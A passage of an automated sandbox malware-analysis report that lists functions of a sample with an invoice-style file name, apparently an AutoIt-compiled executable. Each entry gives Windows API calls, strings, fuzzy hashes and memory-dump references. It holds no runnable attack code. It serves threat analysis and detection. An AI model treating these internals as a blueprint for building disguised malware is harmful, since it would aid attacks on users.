                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00319269
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00319274
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: f71d320159321c45050d6630a3fd060c335d76b66bc2053b6fb408c905a73f6f
                        • Instruction ID: 485b4ee33fdb1ee06cf6b2395add37ca0115392bf7bc9577640dd86dc100c58e
                        • Opcode Fuzzy Hash: f71d320159321c45050d6630a3fd060c335d76b66bc2053b6fb408c905a73f6f
                        • Instruction Fuzzy Hash: A611937160020CBFEF2A8E54DC91FEB37AEEB8D3A4F114525F91897290D671DC918BA0
                        Function 0031970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002CC657
                          • Part of subcall function 002CC619: GetStockObject.GDI32(00000011), ref: 002CC66B
                          • Part of subcall function 002CC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 002CC675
                        • GetWindowRect.USER32(00000000,?), ref: 00319775
                        • GetSysColor.USER32(00000012), ref: 0031978F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: f4d06603a8b2944eba5e017aab4932c0002388538849736afc148cbb01bfc4ce
                        • Instruction ID: 7c0c427acdb3be9371e44a2daca12416d056bb8a73f5b7ecd9b6333b86dd523a
                        • Opcode Fuzzy Hash: f4d06603a8b2944eba5e017aab4932c0002388538849736afc148cbb01bfc4ce
                        • Instruction Fuzzy Hash: 45115972520209AFDB05DFB8DC46EFA7BA8EF08304F055529F956D3280D735E891DB50
                        Function 00319424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 003194A6
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003194B5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: a01f99c71ece5bd69f56da3e64d5203acf9c1a1b596da373c8e5ef83b849a522
                        • Instruction ID: 8c54148238d9d910c9e0d6a2b9586176a70fc79c721e68d2f5393408841cb3ac
                        • Opcode Fuzzy Hash: a01f99c71ece5bd69f56da3e64d5203acf9c1a1b596da373c8e5ef83b849a522
                        • Instruction Fuzzy Hash: 7111BF71100104AFEB168E65DC91FEB376DEB09374F614725F965971D0CB31DC929B60
                        Function 002F5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002F5CF3
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002F5D12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: c899533ca4a4b4bb39663a7178e1f8567f034bcecbdd8440f3373425a659acb8
                        • Instruction ID: 95137340f4e46f7db8fc28281d4cee131acc36db8ce26824b8f9bda215da2f38
                        • Opcode Fuzzy Hash: c899533ca4a4b4bb39663a7178e1f8567f034bcecbdd8440f3373425a659acb8
                        • Instruction Fuzzy Hash: 08118172922A2DABDB21DE5CD848BA9B7E99B06384F190032EB56EB190D3709D14C791
                        Function 003053F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0030544C
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00305475
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: eb8a0b1a0a49cd3f6663b5b13ce929b29e7f16f3805165296094671770e71a57
                        • Instruction ID: 106206a581b569a7a72c44b701d2fb3f7ffc551cfc98f1593466428d77350c55
                        • Opcode Fuzzy Hash: eb8a0b1a0a49cd3f6663b5b13ce929b29e7f16f3805165296094671770e71a57
                        • Instruction Fuzzy Hash: 6211C670542A21BADB168F528CA4EFBFB6CFF12752F10812AF54556480E37059C0CEF0
                        Function 002DB4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002E4557
                        • ___raise_securityfailure.LIBCMT ref: 002E463E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: (7
                        • API String ID: 3761405300-3289126152
                        • Opcode ID: 6efb089a5a1cd9edc1b725fd3711b1e0424167d08f7171f36880d94c75dc61ac
                        • Instruction ID: 1fb3590d87d77a3e4243f3a5bd26614f9985e4ecd29cc6750382c79ce32372e4
                        • Opcode Fuzzy Hash: 6efb089a5a1cd9edc1b725fd3711b1e0424167d08f7171f36880d94c75dc61ac
                        • Instruction Fuzzy Hash: D621E4B5550B04DBD72ADF65EA95640BBA8BB4C310F50582AE50DCBBA0E3F069D0CF45
                        Function 0030ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                        Download Yara Rule
                        APIs
                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • htons.WSOCK32(00000000,?,00000000), ref: 0030AD32
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: htonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 3832099526-2422070025
                        • Opcode ID: 23695a86ce3b555a8676c6893bbc84800939583e85ba4c0dda9f6923e3f38b59
                        • Instruction ID: 409680a1af5fb86a666c6692e34513d29cc3e4345599b08c958cf807bbc2b71c
                        • Opcode Fuzzy Hash: 23695a86ce3b555a8676c6893bbc84800939583e85ba4c0dda9f6923e3f38b59
                        • Instruction Fuzzy Hash: 9E01F535200705ABCB11AFA4E8A6FEDB368FF14720F108526F6159B6D1D771E810CB65
                        Function 002EC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002EC5E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 9c348a7ce4e906a502acc30809599c32a89342802ea51d3574ffe6773bf0fdc0
                        • Instruction ID: 28e8e0412d46b6f23a6b3fd8c88f5a05cbeebd93d9608d06890cbf713206a308
                        • Opcode Fuzzy Hash: 9c348a7ce4e906a502acc30809599c32a89342802ea51d3574ffe6773bf0fdc0
                        • Instruction Fuzzy Hash: 6D01F571661159ABCB04EFA5CC529FF376AAF02350BA40619F462A72C1DF7068299B50
                        Function 002FC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: 513f12fa6e15aa4f2d6722ec577d88db52462062a2409dbcd9b347d4c4163a67
                        • Instruction ID: 4c83512e4c9dee74d1ae381bc482299484785ea9490c7a65b0b2fbf9032efbec
                        • Opcode Fuzzy Hash: 513f12fa6e15aa4f2d6722ec577d88db52462062a2409dbcd9b347d4c4163a67
                        • Instruction Fuzzy Hash: 1E01F9719542586EDB18D798C816FFEBBF89B15711F00415BE153D2181E5B4A718CB60
                        Function 002EC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 002EC4E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 853634974a0019b466e9ab0ecb56d8a8a72cb8e2a52188c7862bae82d14667f8
                        • Instruction ID: a606a6f814d0c9092f9c5f627ea72b32daf22da32fa06d295508c21c84f3b5af
                        • Opcode Fuzzy Hash: 853634974a0019b466e9ab0ecb56d8a8a72cb8e2a52188c7862bae82d14667f8
                        • Instruction Fuzzy Hash: 5F01F2B16A11096BCB15EBE0C962EFF33AD9F01340F640015F543E72C1EE505E299AA1
                        Function 002EC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 002EC562
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1456604079-1403004172
                        • Opcode ID: 8d7bf6fb96a655e2294e59b0d7da0e77f3e15ff22c9201100974b8de29cf4199
                        • Instruction ID: 88e00e78b5730b446b978e9fcb86823442cbbd2608afbd1f86e761966a4338c1
                        • Opcode Fuzzy Hash: 8d7bf6fb96a655e2294e59b0d7da0e77f3e15ff22c9201100974b8de29cf4199
                        • Instruction Fuzzy Hash: 9901D671AA11096BCB15FBE4C952EFF73AD9F01741FB40015F443F32C1DA549E299A61
                        Function 002F804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        • Opcode ID: 4592526bc7de97f3b0808c7a9dc43ef68519c77922db90593c5fee69cf355de3
                        • Instruction ID: a568973564ab13dde4a8ddca200f3c08dfd0a762909a52e8ddc94d742be28ccb
                        • Opcode Fuzzy Hash: 4592526bc7de97f3b0808c7a9dc43ef68519c77922db90593c5fee69cf355de3
                        • Instruction Fuzzy Hash: 72E0D83360022967D721EAA6EC4AED7FBACEB517A4F00002AF924D3141DBB09A5587D0
                        Function 002DDA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __umatherr.LIBCMT ref: 002DDA2A
                          • Part of subcall function 002DDD86: __ctrlfp.LIBCMT ref: 002DDDE5
                        • __ctrlfp.LIBCMT ref: 002DDA47
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __ctrlfp$__umatherr
                        • String ID: xn2
                        • API String ID: 219961500-2517301075
                        • Opcode ID: 692419fdf8b0452d96a87136a24f5e27f99cb2968f38cf4c42586b40d8d67705
                        • Instruction ID: ce016d1612007376396c38a56b373a3a9bcb798c2c9fd4d4ddb272c33059fca5
                        • Opcode Fuzzy Hash: 692419fdf8b0452d96a87136a24f5e27f99cb2968f38cf4c42586b40d8d67705
                        • Instruction Fuzzy Hash: 81E06571408A0FAADF027F80E8066997BA5EF04310F808095F58C14196DFB249B4DB57
                        Function 002EB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002EB36B
                          • Part of subcall function 002D2011: _doexit.LIBCMT ref: 002D201B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: 2eb3363195e82184fd59879ae46409ae897f5c3b75c0533cad75f6cf6e9f6562
                        • Instruction ID: 91aeb491dd0d8d9979de06d5bf3edaf51b6162a89785d585674af66350f5a80d
                        • Opcode Fuzzy Hash: 2eb3363195e82184fd59879ae46409ae897f5c3b75c0533cad75f6cf6e9f6562
                        • Instruction Fuzzy Hash: F8D0123139475832D21726957C47FC666888F55B92F014016FF08A55D68AD1A8A04699
                        Function 0032BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryW.KERNEL32(?), ref: 0032BAB8
                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0032BCAB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: DirectoryFreeLibrarySystem
                        • String ID: WIN_XPe
                        • API String ID: 510247158-3257408948
                        • Opcode ID: 6aabfab658694da379733888172276fb45dfd5b95d2bb626f33e3d612a0e5a0c
                        • Instruction ID: f1e77d5f9f26fcf98f4cd844d36795d27b164a9517463e2f3fd5a0f8bf6b1c10
                        • Opcode Fuzzy Hash: 6aabfab658694da379733888172276fb45dfd5b95d2bb626f33e3d612a0e5a0c
                        • Instruction Fuzzy Hash: A2E0C270D1415DEFCB16DBA8EC85AEDF7BCBB18300F158886E026B2060C7B19A44DF21
                        Function 00318495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031849F
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003184B2
                          • Part of subcall function 002F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 6727b07aa39647c98a91bf4738fd3178800682e2b795cd3715e44f44e84096fe
                        • Instruction ID: 087d1f8955597c1b052dd8ad48a0d9674cd29fa0fe24a8243805d9ed8a98f225
                        • Opcode Fuzzy Hash: 6727b07aa39647c98a91bf4738fd3178800682e2b795cd3715e44f44e84096fe
                        • Instruction Fuzzy Hash: 8BD01276394314B7E766A770EC8FFD7AA58AF14B51F040969B359AA2D0C9E0B810C760
                        Function 003184C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003184DF
                        • PostMessageW.USER32(00000000), ref: 003184E6
                          • Part of subcall function 002F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 95cfaea469eef73d97bb323b02c04162f280aa5c78dde43345ce6e288d996625
                        • Instruction ID: 86d81e23484e7a56cc7ee67268f4aea312c084087448c1ac87c569c0fc81f9ba
                        • Opcode Fuzzy Hash: 95cfaea469eef73d97bb323b02c04162f280aa5c78dde43345ce6e288d996625
                        • Instruction Fuzzy Hash: 08D012723843147BE766A770EC8FFD7A658AB18B51F040969B359AA2D0C9E0B810C764